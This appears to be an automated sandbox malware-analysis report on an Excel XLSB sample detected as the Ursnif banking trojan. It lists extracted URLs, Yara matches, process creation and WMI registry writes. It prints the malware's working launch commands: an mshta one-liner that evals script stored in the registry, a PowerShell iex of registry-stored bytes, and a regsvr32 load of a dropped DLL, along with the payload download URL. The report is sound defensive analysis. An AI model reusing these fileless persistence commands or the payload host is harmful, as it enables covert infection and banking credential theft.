Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: powershell.exe, 00000025.00000002.587720869.0000028658461000.00000004.00000001.sdmp, powershell.exe, 00000027.00000002.589665519.000002B5AD541000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: msapplication.xml.23.dr String found in binary or memory: http://www.amazon.com/
Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msapplication.xml1.23.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.23.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.23.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.23.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.23.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.23.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.23.dr String found in binary or memory: http://www.youtube.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.aadrm.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.cortana.ai
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.office.net
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.onedrive.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://augloop.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://augloop.office.com/v2
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cdn.entity.
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://clients.config.office.net/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://config.edge.skype.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cortana.ai
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cortana.ai/api
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cr.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dev.cortana.ai
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: close.xml String found in binary or memory: https://free.mynowministries.com/app.dll
Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown HTTPS traffic detected: 162.241.253.78:443 -> 192.168.2.3:49725 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_001E39C5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 19_2_00FB39C5

System Summary:

Office process drops PE file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\Public\Documents\decrypt.dll
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_001E2D06
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E8005 NtQueryVirtualMemory, 3_2_001E8005
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 19_2_00FB2D06
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB8005 NtQueryVirtualMemory, 19_2_00FB8005
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E2206 3_2_001E2206
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E3109 3_2_001E3109
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E7DE0 3_2_001E7DE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB2206 19_2_00FB2206
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB7DE0 19_2_00FB7DE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB3109 19_2_00FB3109
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSB@31/52@7/2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E513E CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,FindCloseChangeNotification, 3_2_001E513E
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5164:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5748:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{C75402C6-E233-4D86-BA8E-1D986541630A} - OProcSessId.dat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5008 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17416 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:82956 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17428 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: documentation_39236.xlsb Initial sample: OLE zip file path = xl/media/image1.jpg
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002F.00000002.582791755.000001E9AE630000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583021854.0000021D92B10000.00000002.00000001.sdmp
Source: Binary string: mscorlib.pdb source: csc.exe, 0000002F.00000002.590444392.000001E9B11EC000.00000002.00000001.sdmp
Source: Binary string: c:\Reply-quite\Cry_Country\523\Gave\Color\shape.pdb source: app[1].dll.1.dr

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Registers a DLL
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E7A60 push ecx; ret 3_2_001E7A69
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E7DCF push ecx; ret 3_2_001E7DDF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB7A60 push ecx; ret 19_2_00FB7A69
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB7DCF push ecx; ret 19_2_00FB7DDF

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\Public\Documents\decrypt.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
